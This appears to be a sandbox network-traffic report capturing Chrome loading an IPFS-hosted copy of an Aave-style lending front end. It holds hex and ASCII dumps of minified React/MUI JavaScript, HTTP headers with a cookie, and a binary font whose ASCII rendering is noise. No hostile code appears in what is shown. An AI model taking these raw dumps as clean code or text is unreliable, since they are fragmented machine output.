                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4006931c481-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 39 37 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36 2d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),s=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e
                                                                                                                                                                                                                                                  Data Ascii: xShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e).
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 79 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 72 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 73 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 74 7d
                                                                                                                                                                                                                                                  Data Ascii: length-1&&e.push(a.cloneElement(t,{key:`separator-${o}`})),e)),[])}const y=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let r=(0,o.Z)({display:"flex",flexDirection:"column"},(0,s.k9)({theme:t}
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 34 39 35 30 31 29 2c 6f 3d 72 28 36 38 38 36 31 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 3c 30 3e 41 6d 70 6c 65 66 6f 72 74 68 3c 2f 30 3e 20 69 73 20 61 20 72 65 62 61 73 69 6e 67 20 61 73 73 65 74 2e 20 56 69 73 69 74 20 74 68 65 20 3c 31 3e 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3c 2f 31 3e 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 2e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 61 2e 6a 73 78 29 28 22 62 22 2c 7b 7d 29 2c 31 3a 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 72 55 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 61 61 76 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 73 2f 76 2f 32 2e 30 2f 67 75 69 64 65 73
                                                                                                                                                                                                                                                  Data Ascii: 49501),o=r(68861),a=r(85893),s=function(){return(0,a.jsx)(n.cC,{id:"<0>Ampleforth</0> is a rebasing asset. Visit the <1>documentation</1> to learn more.",components:{0:(0,a.jsx)("b",{}),1:(0,a.jsx)(o.rU,{href:"https://docs.aave.com/developers/v/2.0/guides
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 65 20 73 75 70 70 6c 79 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3a 28 30 2c 6c 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 69 73 20 74 68 65 20 74 6f 74 61 6c 20 61 6d 6f 75 6e 74 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 79 6f 75 20 74 6f 20 62 6f 72 72 6f 77 2e 20 59 6f 75 20 63 61 6e 20 62 6f 72 72 6f 77 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 63 6f 6c 6c 61 74 65 72 61 6c 20 61 6e 64 20 75 6e 74 69 6c 20 74 68 65 20 62 6f 72 72 6f 77 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 47 2c 64 28 64 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 6e 7d 29 29 7d 7d 2c 38 36 30 39 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72
                                                                                                                                                                                                                                                  Data Ascii: e supply cap is reached."}):(0,l.jsx)(a.cC,{id:"This is the total amount available for you to borrow. You can borrow based on your collateral and until the borrow cap is reached."});return(0,l.jsx)(i.G,d(d({},r),{},{children:n}))}},86099:function(e,t,r){r
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 44 65 63 69 6d 61 6c 73 3a 34 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 73 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 2c 63 68 69 6c 64 72 65 6e 3a 66 7d 29 5d 7d 29 5d 7d 29 5d 7d 29 7d 7d 2c 35 33 36 30 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 61 3d 72 28 34 39 35 30 31 29 2c 73 3d 72 28 33 33 37 34 30 29 2c 69 3d 72 28 36 32 30 39 37 29 2c 6c 3d 72 28 33 30 31
                                                                                                                                                                                                                                                  Data Ascii: Decimals:4,variant:"secondary12",color:"text.primary"}),(0,p.jsx)(s.Z,{variant:"tooltip",children:f})]})]})]})}},53601:function(e,t,r){r.d(t,{l:function(){return T},W:function(){return E}});var n=r(59499),o=r(4730),a=r(49501),s=r(33740),i=r(62097),l=r(301
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 73 61 62 6c 65 64 2c 67 3d 65 2e 64 69 73 61 62 6c 65 49 6e 70 75 74 2c 4f 3d 65 2e 6f 6e 53 65 6c 65 63 74 2c 43 3d 65 2e 61 73 73 65 74 73 2c 45 3d 65 2e 63 61 70 54 79 70 65 2c 49 3d 65 2e 6d 61 78 56 61 6c 75 65 2c 50 3d 65 2e 69 73 4d 61 78 53 65 6c 65 63 74 65 64 2c 4c 3d 65 2e 69 6e 70 75 74 54 69 74 6c 65 2c 52 3d 65 2e 62 61 6c 61 6e 63 65 54 65 78 74 2c 5a 3d 65 2e 6c 6f 61 64 69 6e 67 2c 44 3d 76 6f 69 64 20 30 21 3d 3d 5a 26 26 5a 2c 42 3d 65 2e 65 76 65 6e 74 2c 4d 3d 65 2e 73 65 6c 65 63 74 4f 70 74 69 6f 6e 48 65 61 64 65 72 2c 4e 3d 65 2e 73 65 6c 65 63 74 4f 70 74 69 6f 6e 2c 57 3d 65 2e 73 78 2c 5f 3d 76 6f 69 64 20 30 3d 3d 3d 57 3f 7b 7d 3a 57 2c 55 3d 65 2e 65 78 63 68 61 6e 67 65 52 61 74 65 43 6f 6d 70 6f 6e 65 6e 74 2c 71 3d 28 30
                                                                                                                                                                                                                                                  Data Ascii: sabled,g=e.disableInput,O=e.onSelect,C=e.assets,E=e.capType,I=e.maxValue,P=e.isMaxSelected,L=e.inputTitle,R=e.balanceText,Z=e.loading,D=void 0!==Z&&Z,B=e.event,M=e.selectOptionHeader,N=e.selectOption,W=e.sx,_=void 0===W?{}:W,U=e.exchangeRateComponent,q=(0
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 73 65 63 6f 6e 64 61 72 79 22 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 6f 28 22 22 29 7d 2c 64 69 73 61 62 6c 65 64 3a 62 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 73 2e 5a 2c 7b 68 65 69 67 68 74 3a 31 36 7d 29 7d 29 2c 4f 26 26 31 21 3d 3d 43 2e 6c 65 6e 67 74 68 3f 28 30 2c 53 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 73 29 28 66 2e 5a 2c 7b 64 69 73 61 62 6c 65 64 3a 62 2c 76 61 6c 75 65 3a 46 2e 73 79 6d 62 6f 6c 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 43 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 73 79 6d 62 6f 6c 3d 3d 3d 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 7d 29 29
                                                                                                                                                                                                                                                  Data Ascii: secondary"}},onClick:function(){o&&o("")},disabled:b,children:(0,S.jsx)(s.Z,{height:16})}),O&&1!==C.length?(0,S.jsx)(m.Z,{children:(0,S.jsxs)(f.Z,{disabled:b,value:F.symbol,onChange:function(e){var t=C.find((function(t){return t.symbol===e.target.value}))
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 69 63 6f 6e 53 79 6d 62 6f 6c 7c 7c 65 2e 73 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 32 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 76 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 73 79 6d 62 6f 6c 7d 29 2c 65 2e 62 61 6c 61 6e 63 65 26 26 28 30 2c 53 2e 6a 73 78 29 28 6a 2e 42 2c 7b 76 61 6c 75 65 3a 65 2e 62 61 6c 61 6e 63 65 2c 63 6f 6d 70 61 63 74 3a 21 30 7d 29 5d 7d 29 7d 2c 65 2e 73 79 6d 62 6f 6c 29 7d 29 29 5d 7d 29 7d 29 3a 28 30 2c 53 2e 6a 73 78 73 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 53 2e 6a 73 78 29 28 6b
                                                                                                                                                                                                                                                  Data Ascii: iconSymbol||e.symbol,sx:{fontSize:"22px",mr:1}}),(0,S.jsx)(v.Z,{sx:{mr:6},children:e.symbol}),e.balance&&(0,S.jsx)(j.B,{value:e.balance,compact:!0})]})},e.symbol)}))]})}):(0,S.jsxs)(l.Z,{sx:{display:"inline-flex",alignItems:"center"},children:[(0,S.jsx)(k


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.549716209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC866OUTGET /_next/static/media/Inter-Regular.f1f0c35b.woff2 HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                  Content-Length: 98868
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigwclysck2fflyh6gs556zlm4xhnki7oe46osm7usf3tmvzqxbc2y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/media/Inter-Regular.f1f0c35b.woff2
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeifof6k75qeadmbrmujchwmdll7rtygnwlov6xsnie6lclbmeab4zq,bafkreigwclysck2fflyh6gs556zlm4xhnki7oe46osm7usf3tmvzqxbc2y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73291
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 30 38 61 62 34 34 32 39 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e4008ab4429d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 01 82 34 00 0d 00 00 00 04 9e c8 00 01 81 d6 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 0c 1b 84 a6 46 1c 81 aa 4a 06 60 00 81 cb 0a 0a 88 a0 1c 86 eb 39 0b cf 54 00 01 36 02 24 03 cf 4e 04 20 05 8c 72 07 81 c9 2d 5b a5 1b b4 d6 4a 6c db dd 92 5c 5a 20 38 99 9e 0a 42 fc 4a 11 04 05 f1 d3 39 a4 12 6d b1 00 6e 4e b7 fb ef 67 11 95 8c b9 3f 5e 08 41 44 21 d0 ea 18 a2 03 13 09 4a a7 75 fe 59 57 a8 73 7f 84 29 95 ce 5b d4 4a 84 3c d2 ec ff ff ff ff ff ff ff ff ff ff ff ff ff 6f 24 f9 cf a3 9b 7f ee 7d c9 79 23 2f 21 61 05 09 01 8a 82 28 08 32 b4 56 ed 58 fa 47 0b 6a 24 ac a3 f0 21 64 31 2f 3a c8 50 96 55 97 f0 28 d1 43 1f 0e 31 a0 33 18 f6 b3 2c ab 47 b0 17 59 01 27 a2 1b 5c f4 c7 88 f0 cd 24 73 1e
                                                                                                                                                                                                                                                  Data Ascii: wOF24FJ`9T6$N r-[Jl\Z 8BJ9mnNg?^AD!JuYWs)[J<o$}y#/!a(2VXGj$!d1/:PU(C13,GY'\$s
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 25 6d 6d ad c0 5f 7a d6 f7 b3 0f 54 bd 46 44 02 fc 5b 0b f7 9a 6d 67 16 0d fa 2e c9 26 f9 5e d4 0a 10 08 a3 10 20 0e 6e 00 7c 3e c7 71 dc e0 38 bc 07 b9 f4 70 f8 78 2e 6d d2 66 12 8a d8 fe a8 f6 86 d7 0c 57 f0 04 ee f9 89 a4 74 02 ea d6 cc 7d 7b 4f 1f 60 93 08 05 61 1a 69 50 e0 bf 1c 18 80 37 cd b4 2f 3f c3 e1 70 a4 03 99 d8 1d 08 ec 94 6d 18 7a 92 78 1a f4 cb e1 f3 ed 87 5b 24 ae 44 42 a1 4e ee cb 89 28 a6 55 2c 2d 61 af 53 32 29 12 19 e0 6f f9 e5 6b 80 23 8e 1a ac 0f 73 22 3a 65 3f 21 4f 46 dc d8 07 82 cd 66 b4 37 e1 df ff b5 7f 93 7b f6 4c 92 e5 0b f4 fe 8c 2a 81 65 87 92 65 85 ad d0 c0 ca 7c 2a 11 09 d3 a3 9c 7e 5f 55 8b ec aa 6e 49 8e 97 f9 08 74 c3 33 8b 6c 39 71 c0 10 98 e1 80 ba 6b c1 49 16 ed 64 4f 1f 11 2c fb 03 bd 59 82 db 4e ad d1 0c b3 53 5b
                                                                                                                                                                                                                                                  Data Ascii: %mm_zTFD[mg.&^ n|>q8px.mfWt}{O`aiP7/?pmzx[$DBN(U,-aS2)ok#s":e?!OFf7{L*ee|*~_UnIt3l9qkIdO,YNS[
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: b7 57 7a 36 9b 6b 66 c0 2c e8 a4 03 16 0a 35 e3 7a e7 29 45 cb 61 a5 14 68 96 4e 13 da 11 ff fe 7f aa e6 b7 9c 9d a5 94 cf 1a 8e 5c 39 15 b5 8b 2e c4 d4 b4 8b 81 86 77 21 ec 90 c7 e2 c2 3e 5a 99 72 94 f7 a7 d3 ff df f1 61 06 18 12 84 52 74 a2 43 6a ca 5f 14 d5 2f 5b 00 3f 71 e5 1f ed ac ca ff bf aa f6 b5 80 68 39 fc bf 41 1e 6f d0 6c 08 f9 f4 d2 7c 6f ea a6 fd 5b 55 ef dd f7 1e 1e f0 1e 00 92 00 41 51 00 49 53 a0 24 4b 94 35 96 28 39 88 9a 40 80 90 07 a0 28 2b 78 bc 2b d9 fe 21 66 49 3f e4 54 6d b5 45 13 62 15 cb 6a aa 7a ab 72 cf 76 5b b5 cb 03 df 5a cb f7 a6 ec 7e cc 86 10 89 94 a6 31 cc a2 32 f8 a6 e3 12 78 bf 8a 68 49 a4 64 0d 42 24 44 08 17 a7 ed 1e c3 01 62 1a fc ff b7 ac d9 f9 7b 89 4d ac d3 84 c2 c8 15 6e d6 ba ea e9 0d 55 f3 36 17 a1 e7 14 64 95
                                                                                                                                                                                                                                                  Data Ascii: Wz6kf,5z)EahN\9.w!>ZraRtCj_/[?qh9Aol|o[UAQIS$K5(9@(+x+!fI?TmEbjzrv[Z~12xhIdB$Db{MnU6d
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: b6 00 ec 8a 93 79 c3 60 ed bb f3 13 f8 d5 f9 e9 5b a0 14 ff 7f d8 91 bf 4e c3 ca f7 89 95 b0 f5 1f 50 07 cc 38 57 1c 70 9d 1c de 80 4a ec c9 0f f3 c3 aa 82 a0 43 82 85 3f 86 50 0c 1a c0 08 f2 a9 58 e4 8a 69 ae 79 ea 64 64 69 a4 1b 49 c8 cf 5c cf ef d9 0c 73 bc 07 93 a9 69 9d f6 f0 66 e4 31 53 db 6a 56 4d 77 25 8c 75 91 ae 56 50 61 8e d4 7a 01 d7 c3 25 f9 17 7a 5c b7 65 b4 da e9 ae 8c 55 7b ad ce 14 75 d0 17 73 ad 7a 96 e1 43 e3 88 8f db 8a bc 8e 3f 54 e1 3c ee 4f 1c c1 42 7f 66 2a 2f d1 34 16 35 5d e0 aa 28 d9 a3 62 88 8d 2a 5a ec 54 31 f2 d3 0f 15 53 9c c5 55 c5 8a a7 78 a9 78 f1 fe a8 d8 72 e8 b6 4a 5c 9d 87 2a 49 0a 51 25 8b 78 a0 00 9e 61 50 67 6d e9 ff 7a fa e4 1f 45 fa 18 02 a8 38 03 a8 a5 25 a0 84 a2 ea 24 69 16 16 c5 38 9d b6 f5 a1 eb 3e c6 5d ed
                                                                                                                                                                                                                                                  Data Ascii: y`[NP8WpJC?PXiyddiI\sif1SjVMw%uVPaz%z\eU{uszC?T<OBf*/45](b*ZT1SUxxrJ\*IQ%xaPgmzE8%$i8>]
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 79 e3 4d 84 77 de 45 02 00 51 70 78 34 0a 1d 83 c5 c7 31 18 89 6c 76 92 4c 9e ac d4 a5 1a 8d d9 0e e7 1c 57 ff c3 c9 83 95 ec 17 0f 57 be f1 1e 6d c5 22 3c d9 d6 2d f0 61 bb 97 24 62 cf 2f 45 e2 32 96 e5 9f 65 6f 93 8d 3b b3 98 4d fb 7d 49 9b f7 e7 66 6c d9 59 e0 2d 77 2a f3 31 42 2c 16 f4 ea 67 c5 a0 a7 0e b3 68 80 33 87 7e f1 47 f4 db 39 6c 7f 5c a5 f4 cf 2d 66 ff e1 19 5d c2 d2 d4 8c 61 13 cd 5b 31 a8 6b 66 56 9f 39 9e 55 d3 af a5 d5 2d 5d bd 6e 1b 1a 76 d7 d8 b8 7b 20 50 f7 31 98 1e e0 f1 3d 24 91 7a 44 a5 f6 98 ce e8 89 88 b3 8d 4e c9 36 bb 14 7b da 8d da a1 07 b3 8b 5e dd 34 65 94 69 d2 8c 1a 1d 3a 51 07 06 8e 86 63 6c a3 c9 8b 5f 4c 9c 12 10 53 fe 82 62 26 40 48 cc dd 40 cf 2e 41 92 62 e1 39 6e e0 c2 e4 67 0f 08 48 4c c1 a4 05 2c 43 46 cc 65 c9 8a
                                                                                                                                                                                                                                                  Data Ascii: yMwEQpx41lvLWWm"<-a$b/E2eo;M}IflY-w*1B,gh3~G9l\-f]a[1kfV9U-]nv{ P1=$zDN6{^4ei:Qcl_LSb&@H@.Ab9ngHL,CFe
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 4d 66 00 84 60 04 c5 70 82 a4 68 5e 10 6d 76 87 db e3 f5 f9 43 e6 bf 70 82 a4 68 86 e5 78 41 94 64 45 d5 74 c3 b4 6c c7 f5 90 10 24 45 33 2c 80 08 73 bc 20 4a 8a aa e9 86 69 d9 8e 8b 5c 2e 3e 81 3c f9 84 44 0a 15 11 2b 56 42 42 aa 54 19 19 b9 23 ca 35 8e 8e b5 3b 82 ce af 9e ac dd 55 05 18 00 00 30 39 3e 86 00 00 00 00 c0 1f a9 1b be 04 08 00 00 00 00 00 00 00 00 f0 96 b9 15 22 00 cc b4 c8 dd f5 78 5f 05 48 92 14 59 0a 54 a8 51 a7 49 8b 36 5d fa 0c 58 1c 13 61 02 00 00 00 00 00 00 40 d9 ee ef f7 df dd c4 96 44 c1 f2 1a 61 1e 1d 9b 32 dc 8a 31 85 fa 94 73 94 19 4b 67 20 82 b6 04 0e d8 84 4e 94 65 28 bc 6a 18 82 92 b7 db c7 04 b2 ca 37 6d 64 02 fd 0d 2b 09 13 b5 cd 52 d2 40 b3 15 8d 38 b8 78 5a 8e 44 1a 7c 61 65 d8 0e c7 38 f4 9c 44 f0 40 40 ca 85 92 07 2d
                                                                                                                                                                                                                                                  Data Ascii: Mf`ph^mvCphxAdEtl$E3,s Ji\.><D+VBBT#5;U09>"x_HYTQI6]Xa@Da21sKg Ne(j7md+R@8xZD|ae8D@@-
